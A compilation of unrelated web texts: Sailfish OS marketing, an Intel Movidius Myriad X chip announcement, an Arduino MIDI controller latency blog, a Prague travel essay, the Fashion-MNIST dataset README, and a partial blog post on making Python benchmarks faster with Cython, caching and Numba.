
Sailfish OS – True Independent Mobile OS

Sailfish OS offers a truly independent alternative to the existing dominant mobile operating systems.
Partners and users of Sailfish OS can build customized mobile experiences around the content that matters most to them, without restrictions or breaches of privacy.
Sailfish OS is based on open source and is developed by the Finnish mobile company Jolla Ltd. together with the Sailfish OS community.

We invite partners, developers and users worldwide to join us in building a more open future.

Users

Magical User Experience

We believe that user experience is the key to users’ hearts.

Sailfish OS is smooth and fast to use with effortless swipe gestures, simple navigation, and the market’s smartest way to multitask.

Minimalistic Nordic design and regular software updates are the icing on the cake.


Partners

Freedom to Customize

With Sailfish OS you are in control, not locked into the tight rules of the big OSs.

Thanks to Sailfish OS’ open source roots, flexible licensing models and continuous development model, partners can customize anything from the home screen to the core platform and integrate exactly the features and content they want and need.

Moreover, Sailfish OS can be enhanced with full Android application compatibility – but only if you choose to.


Sailfish OS is a people powered platform, built like a classic Linux distribution.

Anyone can join our community, whether to discuss all things Sailfish OS and vote for new features, or to develop apps, the platform, and hardware adaptations through various open source initiatives.



Intel Announces Movidius Myriad X VPU, Featuring ‘Neural Compute Engine’


Today, Intel subsidiary Movidius is announcing the Movidius Myriad X vision processing unit (VPU), a low-power system-on-chip (SoC) intended for deep learning and AI acceleration in vision-based devices such as drones, smart cameras, and VR/AR headsets. This follows up on last month’s launch of the Myriad 2 powered Movidius Neural Compute Stick. The Myriad X will coexist alongside its predecessor, the Myriad 2, which was first announced in 2014. Movidius states that the Myriad X will offer ten times the performance of the Myriad 2 in deep neural network (DNN) inferencing within the same power envelope, while the Myriad 2 will remain a lower-performance option.

Under the hood, the Myriad X SoC features what Movidius is calling a Neural Compute Engine, an on-chip DNN accelerator. With it, Movidius states that the Myriad X can achieve over one trillion operations per second (1 TOPS) of peak DNN inferencing throughput, against the backdrop of the Myriad X’s theoretical 4+ TOPS of total compute capability.

In addition, the Myriad X has four more C-programmable 128-bit VLIW vector processors and more configurable MIPI lanes than the Myriad 2, as well as an expanded 2.5 MB of on-chip memory and additional fixed-function imaging/vision accelerators. Like those found in the Myriad 2, the Myriad X’s vector units are proprietary SHAVE (Streaming Hybrid Architecture Vector Engine) processors optimized for computer vision workloads. The Myriad X also supports the latest LPDDR4, while the MA2085 variant forgoes in-package memory and is equipped only with interfaces to external memory. In an accompanying launch video, Movidius locates the Myriad X functions on a stylized die shot.

Another new feature of the Myriad X is 4K hardware encoding, with 4K at 30 Hz (H.264/H.265) and 60 Hz (M/JPEG) supported. Interface-wise, the Myriad X brings USB 3.1 and PCIe 3.0 support, both new to the Myriad VPU family. All this is done within the same <2 W power envelope as the Myriad 2, cited more specifically as within 1 W.

Movidius Myriad Family VPUs

                         Myriad 2                                   Myriad X
Vector Processors        12x SHAVE processors                       16x SHAVE processors
On-chip Accelerators     ~20 image/vision processing accelerators   20+ image/vision processing accelerators,
                                                                    Neural Compute Engine (DNN accelerator)
On-chip Memory (BW)      2 MB (400 GB/sec)                          2.5 MB (450 GB/sec)
DRAM Configurations      1 Gbit LPDDR2 (MA215X),                    No in-package memory (MA2085),
                         4 Gbit LPDDR3 (MA245X)                     4 Gbit LPDDR4 (MA2485)
Key Interfaces           12x MIPI lanes, USB 3                      16x MIPI lanes, USB 3.1, PCIe 3.0
Process                  28nm HPC/HPM (TSMC)                        16nm FFC (TSMC)
Package                  6.5mm x 6.5mm (MA215X),                    8.1mm x 8.8mm (MA2085, MA2485)
                         8mm x 9.5mm (MA245X)

At a glance, much of the Myriad X’s extra performance at the same Myriad 2 power appears to come from its new 16nm FFC TSMC process node. In shrinking from a 28nm planar process to 16nm FinFET, Movidius was able to invest the power savings into upped clocks as well as more SHAVE processors, accelerators, interfaces, and memory, all in a relatively similar package size. While Intel indeed has its own fabs, Movidius stated that the Myriad X was in development well before Intel acquired Movidius in 2016, and thus 16nm FFC was the node of choice. This 16nm FFC iteration comes after the Myriad 2’s incarnations on 28nm HPM and HPC.

While specifics were not disclosed, the Myriad X VPU comes with an SDK that includes a neural network compiler and “a specialized FLIC framework with a plug-in approach to developing application pipelines.” In any case, like the Myriad 2, the Myriad X will be programmable via the Myriad Development Kit (MDK). At this time, there were no details about the reference kit hardware.

As mentioned earlier, the Myriad 2 will not be replaced by the Myriad X. Last January, the Myriad 2 was described as costing under $10; based on the higher cost FinFET process and additional hardware features, the Myriad X will likely command a higher price for the higher performance.

Update (8/28/17): An Intel representative has given an update stating that 8.1mm x 8.8mm are the correct dimensions for the Myriad X VPUs. The original specifications (8.5mm x 8.7mm) that were given out were incorrect. The press kit photo has been updated.

Optimizing latency of an Arduino MIDI controller


Update: The dhang is now available for preorder, and you can join a workshop to build it yourself!

Feedback from first user testing of the dhang digital hand drum was that the latency was too high. How did we bring it down to a good level?

dhang: A MIDI controller using capacitive touch sensors for triggering. An Arduino board processes the sensor data and sends MIDI notes over USB to a PC or mobile device. A synthesizer on the computer turns the notes into sound.

Testing latency

For an interactive system like this, what matters is the performance experienced by the user. For a MIDI controller that means the end-to-end latency, from hitting the pad until the sound triggered is heard. So this is what we must be able to observe in order to evaluate current performance and the impact of attempted improvements. And to have concrete, objective data to go by, we need to measure it.

My first idea was to use a high-speed camera, using the video image to determine when the pad is hit and the audio to detect when sound comes from the computer. However, even at 120 FPS, which some modern cameras/smartphones can do, there is 8.33 ms per frame. So finding when the pad was hit with higher accuracy (1 ms) would require using multiple frames and interpolating the motion between them.

Instead we decided to go with a purely audio-based method:

Test setup for measuring MIDI controller end2end latency using audio recorded with smartphone.

  • The microphone is positioned close to the controller pad and the output speaker
  • The controller pad is tapped with the finger quickly and hard enough to be audible
  • Volume of the output was adjusted to be roughly the same level as the sound of physically hitting the pad
  • In case the images are useful for understanding the recorded test, video is also recorded
  • The synthesized sound was chosen to be easily distinguished from the thud of the controller pad

To get access to more settings, the open-source OpenCamera Android app was used. We set a low video bitrate to save space and enabled macro mode to make focusing on close objects easier. For synthesizing sounds from the MIDI signals we use LMMS, a simple but powerful digital music studio.

Then we open the video in Audacity audio editor to analyze the results. Using Effect->Amplify to normalize the audio to -1db makes it easier to see the waveforms. And then we can manually select and label the distance between the starting points of the sounds to get our end-to-end latency.

Raw sound data, data with normalized amplitude and measured distance between the sound of tapping the sensor and the sound coming from speakers.

How good is good enough?

We now know that the latency experienced by our testers was around 137 ms. For reference, when playing a (relatively slow) 4/4 beat at 120 beats per minute, the distance between 16th notes is 125 ms. In the following sound clip the kick drum plays 4/4 and the ‘ping’ plays all 16 16th notes.

So the latency experienced would offset the sound by more than one 16th note! We can understand that this would make it tricky to play.

For professional-level audio, less than 10 ms is commonly cited as the desired performance, especially for percussion. From Action-Sound Latency: Are Our Tools Fast Enough?

Wessel and Wright suggested that digital musical
instruments should aim for latency less than 10ms [22]

Dahl and Bresin [3] found that in a system
with latency, musicians execute their gestures ahead of the
beat to align the sound with a metronome, and that they
can maintain synchronisation this way up to 55ms latency.

Since the instrument in question is going to be a kit targeted at hobbyists/amateurs, we decided on an initial target of <30ms.

Sources of latency

Latency, like other performance issues, is a compounding problem: each operation in the chain adds to it. However, usually a large portion of the time is spent in a small part of the system, so an important part of optimization is to locate the areas which matter (or rule out areas that don’t).

For the MIDI controller system in question, a software-centric view looks something like:

A functional view of the system and major components that may contribute to latency. Made with Flowhub

There are also sources of latency outside the software and electronics of the system. The capacitive effect that the sensor relies on has a non-zero response time, and it takes time for sound played by the speakers to reach our ears. The latter can quickly become significant; at 4 meters the delay is already over 10 milliseconds.

And at this time, we know what the total latency is, but don’t have information about how it is divided.

With simulation-hardened Arduino firmware

The system tested by users was running the very first hardware and firmware version. It used an Arduino Uno. Because the Uno lacks native USB, a serial-to-MIDI bridge process had to run on the PC. Afterwards we developed a new firmware, guided by recorded sensor data and host-based simulation. From the data gathered we also decided to switch to a more sensitive sensor setup. And we switched to an Arduino Leonardo with native USB-MIDI.

Latency with new firmware (with 1 sensor) was reduced by 50 ms (35%).

This firmware also logs how long each sensor reading cycle takes. It was under 1 ms for the recorded single-sensor setup. The sensor readings went almost instantly from low to high (1-3 cycles). So if the sensor reading and triggering takes just 3 ms, the remaining 84 ms must be elsewhere in the system!

Low-latency audio, a hard real-time problem

The two other main areas of the system are: the USB/MIDI communication from the Arduino to the PC, and the sound synthesis/playback. USB MIDI should generally be relatively low-latency, and it is a subsystem which we cannot influence so easily – so we focus first on the sound aspects.

Since a PC must be able to multi-task, audio is processed in chunks: a buffer of N samples. This allows some flexibility. However, if processing is interrupted for too long or too often, the buffer may not be completely filled. The resulting glitch is usually heard as a pop or crackle. The lower the latency we want, the smaller the buffer, and the higher the chance that something will interrupt for too long. At 96 samples per buffer and a 48 kHz sample rate, each buffer is just 2 milliseconds long.
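As a back-of-the-envelope check, the buffer latency follows directly from buffer size and sample rate. Here is a minimal Python sketch (the helper name and the double-buffering assumption are mine, not from the original setup):

def buffer_latency_ms(buffer_samples, sample_rate_hz, n_buffers=1):
    """Time covered by the audio buffer(s), in milliseconds."""
    return 1000.0 * n_buffers * buffer_samples / sample_rate_hz

print(buffer_latency_ms(96, 48000))        # 2.0 ms for a single 96-sample buffer
print(buffer_latency_ms(96, 48000, 2))     # 4.0 ms when double-buffered
print(buffer_latency_ms(256, 48000, 2))    # ~10.7 ms for a 256-sample, 2-buffer setup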

With JACK on Linux

I did the next tests on Linux, since I know it better than Windows. Configuring JACK to 256 samples/buffer, we see that the audio configuration does indeed have a large impact.

Latency reduced to half by configuring Linux with JACK for low-latency audio.

With ASIO4ALL on Windows

But users of the kit are unlikely to use Linux, so a solution that works with Windows is needed (at least). We tried all the different driver options in LMMS, switching to Hydrogen drum machine, as well as attempting to use JACK on Windows. None of these options worked well.
So in the end we tried going with ASIO, using the ASIO4ALL replacement drivers. Since ASIO is proprietary, LMMS/PortAudio does not support it out of the box. Instead you have to manually replace the PortAudio DLL that comes with LMMS with a custom one 🙁 *nasty*.

With ASIO4ALL we were able to set the buffer size as low as 96 samples, 2 buffers without glitches.

ASIO on Windows achieves very low latencies. Measurement of single sensor.

Completed system

Bringing back the 8 other sensors again adds around 6 ms to the sensor reading, bringing the final latency to around 20ms. There are likely still possibilities for significant improvements, but the target was reached so this will be good enough for now.

A note on jitter

The variation in latency of an audio system is called jitter. Ideally a musical instrument would have a constant latency (no jitter). When a musical instrument has significant amounts of jitter, it is harder for the player to compensate for the latency.

Measuring the amount of jitter would require some automated tools for the audio analysis, but should otherwise be doable with the same test setup.
The audio pipeline should have practically no variation, but the USB/MIDI communication might be a source of variation. The CapacitiveSensor Arduino library is known to have variation in sensor readout time, depending on the current capacitance of the sensor.
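Such automation could be a small script that finds onset times by thresholding the normalized waveform and then pairs each tap onset with the following synthesized-sound onset. A minimal sketch follows; the file name, threshold value, and the assumption of exactly two audible events per tap are all hypothetical, not from the original test setup:

import numpy as np
from scipy.io import wavfile

def onset_times(path, threshold=0.3, min_gap_s=0.02):
    rate, data = wavfile.read(path)
    if data.ndim > 1:                           # mix stereo down to mono
        data = data.mean(axis=1)
    data = data / np.max(np.abs(data))          # normalize, like Amplify in Audacity
    above = np.flatnonzero(np.abs(data) > threshold)
    onsets = [above[0]]
    prev = above[0]
    for idx in above[1:]:
        if idx - prev > min_gap_s * rate:       # a new event starts after a quiet gap
            onsets.append(idx)
        prev = idx
    return np.array(onsets) / rate              # onset times in seconds

times = onset_times('tap_recording.wav')
latencies = times[1::2] - times[0::2]           # pair tap onsets with synth onsets
print('latency per tap (ms):', latencies * 1000)
print('jitter (std dev, ms):', latencies.std() * 1000)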

Conclusions

By recording audible taps of the sensor with a smartphone and analyzing the recording in a standard audio editor, one can measure end-to-end latency in a tactile-to-sound instrument. A combination of tweaking the sensor hardware layout, improving the Arduino firmware, and configuring PC software for low-latency audio was needed to achieve acceptable levels of latency. The first round of improvements brought the latency down from an ‘almost unplayable’ 134 ms to a ‘hobby-friendly’ 20 ms.

Comparison of latency between the different configurations tested.


Prague: The Musical City. Národní – The Blogging Musician

Prague : The Musical City. Národní. The Blogging Musician @ adamharkus.com

Národní represents the very essence of Prague.  After the window dressing of Wenceslas Square and Na Příkopě, Národní has no pretensions,  no obvious purpose or audience, and it’s here that you begin to understand the real Prague, warts and all, unashamed and proud.

Národní is Prague.

Starting off in a very business-like manner, Národní seems grey and lacking character, its wideness and tight cobbles providing ample surface for the locals, who start to encroach on the tourist numbers for the first time. To my left is Prague’s version of Tesco, labelled ‘My’. I strolled in just to have a look around the three-storey department store and to my surprise stumbled across a particularly well-stocked music section. This was the first hint at the whole musical culture in Prague, and the reason behind the title of this series. Back home, you never saw a guitar for sale outside of a dedicated guitar shop, let alone a supermarket. But more than that, the quality of the instruments surpassed most guitar shops back home too. Not just guitars either: there were wind instruments, keyboards, you name it… in Tesco!?

After the minor culture shock, I headed over the road to the U medvídků beer hall (the letter U featured heavily in most pub names for some reason). As I confidently pushed through the door, I was met by groups of people, all sat around separate tables in deep conversation. It looked more like a brewery than a pub: all brass pipework, vessels and solid, natural wood. Again, the standard English procedure of propping up the bar didn’t really work here. I lingered for a moment, but the staff were all tending to their seated customers. After an uncomfortable length of time I received my (delicious) large pilsner and reluctantly took up a seat. If you can’t beat ’em, join ’em. Drinking seemed to be a very close-knit ‘family’ thing here, almost always involving food. There was none of the fast-paced pub-crawl culture of back home, more a relaxed, unhurried excuse to sit around a table and be sociable with family and friends. It’s such a shame it hasn’t caught on here.

Prague’s Rock Cafe was a real eye-opener.  The last time I visited the place was way back in 2001, but for all intents and purposes it was 1992 inside. Nirvana and grunge music were still in their heyday here, almost ten years behind the rest of the world. But the exuberance of the floppy haired, lumberjack-shirted youth had even more vigour in these darkened, sweaty halls. The atmosphere was underground almost, safely hidden from authority. This was a release of the tensions I so far knew very little about. For me, it was a chance to relive some of the best times of my life, like going back in a time machine, a beautiful feeling, but also with a slightly sour note that something was not quite right about the place, something sinister, oppressive even, as if one wrong move could mean the end in an instant.  Looking past the paying customers, you could see the stark contrast in the battle-hardened, battle-scarred staff.  Stoically, menacingly watching, monitoring every move.  Was there a reason we were ten years out of date? Has culture and media been controlled in some way?  For now I just enjoyed the memories.

Unlike Wenceslas Square , Národní proudly displayed its ‘Dancing Bars’, tobacco and liquor stores for all the world to see. You get the feeling it doesn’t really care about the outside world’s opinion, and with the Tram-lines, layout and location, a sense that it may once have been Prague’s main high-street, but fallen out of favour because the face didn’t fit.

Towards the end of Národní, the view gets notably more official, regal even, with architecture rivalling Wenceslas Square but somehow more authentic and definitely more understated. The billboards advertise a rogue’s gallery of the greatest classical music virtuosos in the city, even the world, far in advance of my modest guitar skills. This was the pinnacle. Violin soloists stood out like gladiators with their Stradivariuses, jazz musicians with decades of experience between them, producing chords and scales I could only dream about. Even the solo guitarists took it up to another level, big names in the acoustic and flamenco arena, masters of their instrument, all under the banner, the rubber stamp of the Musical City.

And yet somehow the adverts seem more like watered-down demonstrations, a toe in the water against the system that hopefully slips under the radar. There’s no razzmatazz which would bring the hammer down, no glimpses of personality or character; it’s all about the music, and maybe it’s only allowed to be.

The tram terminus, grand government buildings and opera houses frame the first glimpses of the Vltava River, with, on the right corner, the splendidly high-class Cafe Slavia providing the icing on the cake. The road widens out to accommodate the patchwork of the intricate tram crossroads, which carries on over the bridge and beyond and opens out to the leafy but still dramatic riverside. Nothing seems forced. From end to end Národní holds your interest and wins your heart like an old man’s long-sleeve tattoo, etched with a lifetime’s worth of laughter, joy and pain.

Thinking back to the taxi ride here, Národní had provided me with my first glimpse of the ‘soul’ of Prague and its people. Here, there was no filter, nothing to hide, even a slight tinge of defiance. I’d begun to notice its love for music and expression, even in the face of intolerance, and that feeling lured me in to explore deeper.

An MNIST-like fashion product dataset


README.md


Fashion-MNIST is a dataset of Zalando's article images—consisting of a training set of 60,000 examples and a test set of 10,000 examples. Each example is a 28x28 grayscale image, associated with a label from 10 classes. We intend Fashion-MNIST to serve as a direct drop-in replacement for the original MNIST dataset for benchmarking machine learning algorithms. It shares the same image size and structure of training and testing splits.

Here's an example of how the data looks (each class takes three rows):

Why we made Fashion-MNIST

The original MNIST dataset contains a lot of handwritten digits. Members of the AI/ML/Data Science community love this dataset and use it as a benchmark to validate their algorithms. In fact, MNIST is often the first dataset researchers try. "If it doesn't work on MNIST, it won't work at all", they said. "Well, if it does work on MNIST, it may still fail on others."

To Serious Machine Learning Researchers

Seriously, we are talking about replacing MNIST. Here are some good reasons:

Get the Data

You can use direct links to download the dataset. The data is stored in the same format as the original MNIST data.

Name                         Content              Examples   Size         Link
train-images-idx3-ubyte.gz   training set images  60,000     26 MBytes    Download
train-labels-idx1-ubyte.gz   training set labels  60,000     29 KBytes    Download
t10k-images-idx3-ubyte.gz    test set images      10,000     4.2 MBytes   Download
t10k-labels-idx1-ubyte.gz    test set labels      10,000     5.0 KBytes   Download

Alternatively, you can clone this GitHub repository; the dataset appears under data/fashion. This repo also contains some scripts for benchmark and visualization.

git clone git@github.com:zalandoresearch/fashion-mnist.git

Labels

Each training and test example is assigned to one of the following labels:

Label   Description
0       T-shirt/top
1       Trouser
2       Pullover
3       Dress
4       Coat
5       Sandal
6       Shirt
7       Sneaker
8       Bag
9       Ankle boot

Usage

Loading data with Python (requires NumPy)

Use utils/mnist_reader in this repo:

import mnist_reader
X_train, y_train = mnist_reader.load_mnist('data/fashion', kind='train')
X_test, y_test = mnist_reader.load_mnist('data/fashion', kind='t10k')
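As a quick usage example (not part of the original README), the arrays returned above can be fed straight into a scikit-learn classifier. This sketch assumes the loader returns the flattened 784-pixel rows and that scikit-learn is installed:

from sklearn.linear_model import LogisticRegression

# A simple linear baseline; may warn about convergence, it is only a sanity check.
clf = LogisticRegression(max_iter=100)
clf.fit(X_train[:10000] / 255.0, y_train[:10000])   # subsample to keep it quick
print(clf.score(X_test / 255.0, y_test))            # accuracy on the test set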

Loading data with Tensorflow

from tensorflow.examples.tutorials.mnist import input_data
data = input_data.read_data_sets('data/fashion')

data.train.next_batch(100)

Loading data with other languages

As one of the Machine Learning community's most popular datasets, MNIST has inspired people to implement loaders in many different languages. You can use these loaders with the Fashion-MNIST dataset as well. (Note: may require decompressing first.) To date, we haven't yet tested all of these loaders with Fashion-MNIST.
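If a loader expects the raw IDX files rather than the .gz archives, a few lines of Python can decompress them first (a small convenience sketch, assuming the files sit under data/fashion as in the table above):

import gzip, shutil

for name in ['train-images-idx3-ubyte', 'train-labels-idx1-ubyte',
             't10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte']:
    with gzip.open('data/fashion/%s.gz' % name, 'rb') as f_in, \
         open('data/fashion/%s' % name, 'wb') as f_out:
        shutil.copyfileobj(f_in, f_out)   # write the uncompressed IDX file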

Benchmark

We built an automatic benchmarking system based on scikit-learn that covers 128 classifiers (but no deep learning) with different parameters. Find the results here.

You can reproduce the results by running benchmark/runner.py. We recommend building and deploying this Dockerfile.

You are welcome to submit your benchmark; simply create a new issue and we'll list your results here. Before doing that, please make sure it does not already appear in this list. Visit our contributor guidelines for additional details.

Classifier                                    Preprocessing                                   Fashion acc.   MNIST acc.   Submitter              Code
2 Conv layers with max pooling (Keras)        None                                            0.876          -            Kashif Rasul           🔗
2 Conv layers with max pooling (Tensorflow),  None                                            0.916          -            Tensorflow's doc       🔗
  >300 epochs
Simple 2-layer convnet, <100K parameters      None                                            0.925          0.992        @hardmaru              🔗
GRU+SVM                                       None                                            0.888          -            @AFAgarap              🔗
GRU+SVM with dropout                          None                                            0.855          -            @AFAgarap              🔗
WRN40-4, 8.9M params                          mean/std subtraction/division; random crops,    0.967          -            @ajbrock               🔗🔗
                                                horizontal flips
DenseNet-BC, 768K params                      mean/std subtraction/division; random crops,    0.954          -            @ajbrock               🔗🔗
                                                horizontal flips
MobileNet                                     augmentation (horizontal flips)                 0.950          -            @苏剑林                 🔗
ResNet18                                      normalization; random horizontal/vertical       0.949          0.979        Kyriakos Efthymiadis   🔗
                                                flips, translation, rotation
Simple 2-layer convnet                        normalization; random horizontal/vertical       0.919          0.971        Kyriakos Efthymiadis   🔗
                                                flips, translation, rotation

Other Explorations of Fashion-MNIST

Generative adversarial networks (GANs)

Misc.

Visualization

t-SNE on Fashion-MNIST (left) and original MNIST (right)

PCA on Fashion-MNIST (left) and original MNIST (right)

Contributing

Thanks for your interest in contributing! There are many ways to get involved; start with our contributor guidelines and then check these open issues for specific tasks.

Contact

To discuss the dataset, please use Gitter.

Citing Fashion-MNIST

If you use Fashion-MNIST in a scientific publication, we would appreciate references to the following paper:

Fashion-MNIST: a Novel Image Dataset for Benchmarking Machine Learning Algorithms. Han Xiao, Kashif Rasul, Roland Vollgraf. arXiv:1708.07747

Biblatex entry:

@online{xiao2017/online,
  author       = {Han Xiao and Kashif Rasul and Roland Vollgraf},
  title        = {Fashion-MNIST: a Novel Image Dataset for Benchmarking Machine Learning Algorithms},
  date         = {2017-08-28},
  year         = {2017},
  eprintclass  = {cs.LG},
  eprinttype   = {arXiv},
  eprint       = {cs.LG/1708.07747},
}

License

The MIT License (MIT) Copyright © [2017] Zalando SE, https://tech.zalando.com

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

How to Make Python Run as Fast as Julia


Should we ditch Python and other languages in favor of Julia for technical computing?  That's certainly a thought that comes to mind when one looks at the benchmarks on http://julialang.org/.  Python and other high-level languages are way behind in terms of speed.  The first question that came to my mind was different, however: did the Julia team write the Python benchmarks in the best way for Python?

My take on this kind of cross-language comparison is that the benchmarks should be defined by tasks to perform, then have language experts write the best code they can to perform these tasks.  If the code is all written by one language team, then there is a risk that the other languages aren't used to their best advantage.

One thing the Julia team did right is to publish on github the code they used.  In particular, the Python code can be found here

A first look at this code confirms the bias I was afraid of.  The code is written in a C style with heavy use of loops over arrays and lists.  This is not the best way to use Python.

I won't blame the Julia team, as I have been guilty of the exact same bias.  But I learned the hard lesson: loops on arrays or lists should be avoided at almost any cost as they are really slow in Python, see Python is not C.

Given this bias towards C style, the interesting question (to me at least) is whether we can improve these benchmarks with a better use of Python and its tools? 

Before I give the answer below, let me say that I am in no way trying to downplay Julia.  It is certainly a language worth monitoring as it is further developed and improved.  I just want to have a look at the Python side of things.  Actually, I am using this as an excuse to explore various Python tools that can be used to make code run faster. 

In what follows I use Python 3.5.1 with Anaconda on a Windows machine.  The notebook containing the complete code for all benchmarks below is available on github and on nbviewer.

Comments on various social media prompt me to add this: I am not writing any C code here; if you're not convinced, then try to find any semicolon. All the tools used in this blog run in the standard CPython implementation available in Anaconda or other distributions.  All the code below runs in a single notebook.  I tried to use the Julia micro performance file from github but it does not run as is with Julia 0.4.2.  I had to edit it and replace @timeit by @time to make it run.  I also had to add calls to the timed functions before timing them, otherwise the compilation time was included.  I ran it with the Julia command line interface, on the same machine as the one used to run Python.

Timing Code

The first benchmark Julia team used is a naive coding of the Fibonacci function. 

def fib(n):
    if n < 2:
        return n
    return fib(n-1) + fib(n-2)

This function grows rapidly with n, for instance:

fib(100) = 354224848179261915075

Note how Python's arbitrary precision comes in handy.  Coding the same in a language like C would require some effort to avoid integer overflow.  In Julia one would have to use the BigInt type.

All the Julia benchmarks are about running times.  Here are the timings with and without BigInt in Julia

  0.000080 seconds (149 allocations: 10.167 KB)
  0.012717 seconds (262.69 k allocations: 4.342 MB)

One way to get running times in Python notebooks is to use the magic %timeit.  For instance, typing

%timeit fib(20)

in a new cell and executing it outputs

100 loops, best of 3: 3.77 ms per loop

It means that the timer did the following:

  1. Run fib(20) one hundred times, store the total running time
  2. Run fib(20) one hundred times, store the total running time
  3. Run fib(20) one hundred times, store the total running time
  4. Get the smallest total running time from the three runs, divide it by 100, and output the result as the best running time for fib(20)

The sizes of loops (100  and 3 here) are automatically adjusted by the timer.  They may change depending on how fast the timed code runs.

Python timing compares very favorably against Julia timing when BigInt are used: 3 milliseconds vs 12 milliseconds.  Python is 4 times faster than Julia when arbitrary precision is used. 

However, Python is way slower than Julia's default 64 bits integers.  Let's see how we can force the use of 64 bits integers in Python.

Compiling With Cython

One way to do it is to use the Cython compiler.  This compiler is written in Python.  It can be installed via

pip install Cython

If you use Anaconda, the installation is different.  As it is a bit tricky I wrote a blog entry about it: Installing Cython For Anaconda On Windows

Once installed, we load Cython in the notebook with the %load_ext magic:

%load_ext Cython

We can then compile code in our notebook.  All we have to do is to put all the code we want to compile in one cell, including the required import statements, and start that cell with the cell magic %%cython:

%%cython
def fib_cython(n):
    if n < 2:
        return n
    return fib_cython(n-1) + fib_cython(n-2)

Executing that cell compiles the code seamlessly.  We use a slightly different name for our function to reflect that it is compiled with Cython.  Of course, there is no need to do this in general.  We could have replaced the previous function by a compiled function of the same name.

Timing it yields

1000 loops, best of 3: 1.47 ms per loop

Wow, more than 2 times faster than the original Python code!  We are now 9 times faster than Julia with BigInt.

We can also try with static typing.  We declare the function with the keyword cpdef instead of def.  It allows us to type the parameters of the function with their corresponding C types.  Our code becomes.

%%cython
cpdef long fib_cython_type(long n):
    if n < 2:
        return n
    return fib_cython_type(n-1) + fib_cython_type(n-2)

After executing that cell, timing it yields

10000 loops, best of 3: 24.4 µs per loop

Amazing, we're now at 24 micro seconds, about 150 times faster than the original benchmark !   This compares favorably with the 80 microseconds used by Julia.

One can argue that static typing defeats the purpose of Python.  I kind of agree with that in general, and we will see later a way to avoid this without sacrificing performance.  But I don't think this is the issue here.  The Fibonacci function is meant to be called with integers.  What we lose with static typing is the arbitrary precision that Python provides.  In the case of Fibonacci, using the C type long limits the size of the input parameter because too large parameters would result in integer overflow. 

Note that Julia computation is done with 64 bits integers too, hence comparing our statically typed version with that of Julia is fair. 

Caching Computation

We can do better while keeping Python arbitrary precision.  The fib function repeats the same computation many times.  For instance, fib(20) will call fib(19) and fib(18).  In turn, fib(19) will call fib(18) and fib(17).  As a result fib(18) will be called twice.  A little analysis shows that fib(17) will be called 3 times, and fib(16) five times, etc. 

In Python 3, we can avoid these repeated computations using the functools standard library. 

from functools import lru_cache as cache

@cache(maxsize=None)
def fib_cache(n):
    if n < 2:
        return n
    return fib_cache(n-1) + fib_cache(n-2)

Timing this function yields:

1000000 loops, best of 3: 127 ns per loop

This is an additional 190 times speedup, and about 30,000 times faster than the original Python code!  I find it impressive given we merely add an annotation to the recursive function.

Note that Julia also can memoize functions, see this example provided by Ismael V.C.

This automated cache isn't available with Python 2.7.  We need to transform the code explicitly in order to avoid duplicate computation in that case.

def fib_seq(n):
    if n < 2:
        return n
    a, b = 1, 0
    for i in range(n-1):
        a, b = a+b, a
    return a

Note that this code makes use of Python's ability to simultaneously assign two local variables.  Timing it yields

1000000 loops, best of 3: 1.81 µs per loop

Another 20 times speedup!  Let us compile our function, with and without static typing.  Note how we use the cdef keyword to type local variables.

%%cython

def fib_seq_cython(n):
    if n < 2:
        return n
    a, b = 1, 0
    for i in range(n-1):
        a, b = a+b, a
    return a

cpdef long fib_seq_cython_type(long n):
    if n < 2:
        return n
    cdef long a, b
    a, b = 1, 0
    for i in range(n-1):
        a, b = a+b, a
    return a

We can time both versions in one cell:

%timeit fib_seq_cython(20)
%timeit fib_seq_cython_type(20)

It yields

1000000 loops, best of 3: 953 ns per loop

10000000 loops, best of 3: 82 ns per loop

We are now at 82 nano seconds with the statically typed code, about 45,000  times faster than the original benchmark! 

If we want to compute the Fibonacci number for arbitrary input, then we should stick to the untyped version, which runs with a respectable 30,000 times speedup.  Not bad, is it?

Compiling With Numba

Let us use another tool called Numba.  It is a just-in-time (JIT) compiler for a subset of Python.  It does not work yet on all of Python, but when it does work it can do wonders.

Installing it can be cumbersome.  I recommend that you use a Python distribution like Anaconda or a Docker image where Numba is already installed.  Once installed, we import its jit compiler:

from numba import jit

Using it is very simple.  We only need to add a decoration to the functions we want to compile.  Our code becomes:

@jit
def fib_seq_numba(n):
    if n < 2:
        return n
    a, b = 1, 0
    for i in range(n-1):
        a, b = a+b, a
    return a

Timing it yields

1000000 loops, best of 3: 216 ns per loop

We are faster than the untyped Cython code, and about 17,000 times faster than the original Python code! 

Using Numpy

Let's now look at the second benchmark.  It is an implementation of the quicksort algorithm.  Julia team used that Python code:

def qsort_kernel(a, lo, hi):
    i = lo
    j = hi
    while i < hi:
        pivot = a[(lo+hi) // 2]
        while i <= j:
            while a[i] < pivot:
                i += 1
            while a[j] > pivot:
                j -= 1
            if i <= j:
                a[i], a[j] = a[j], a[i]
                i += 1
                j -= 1
        if lo < j:
            qsort_kernel(a, lo, j)
        lo = i
        j = hi
    return a

I wrapped their benchmarking code in a function:

import random

def benchmark_qsort():
    lst = [random.random() for i in range(1, 5000)]
    qsort_kernel(lst, 0, len(lst)-1)

Timing it yields:

100 loops, best of 3: 17.7 ms per loop

The above code is really like C code.  Cython should do well on it.  Besides using Cython and static typing, let us use Numpy arrays instead of lists.  Indeed, Numpy arrays are faster than Python lists when their size is large, say thousands of elements or more. 

Installing Numpy can take a while, I recommend you use Anaconda or a Docker image where the Python scientific stack is already installed. 

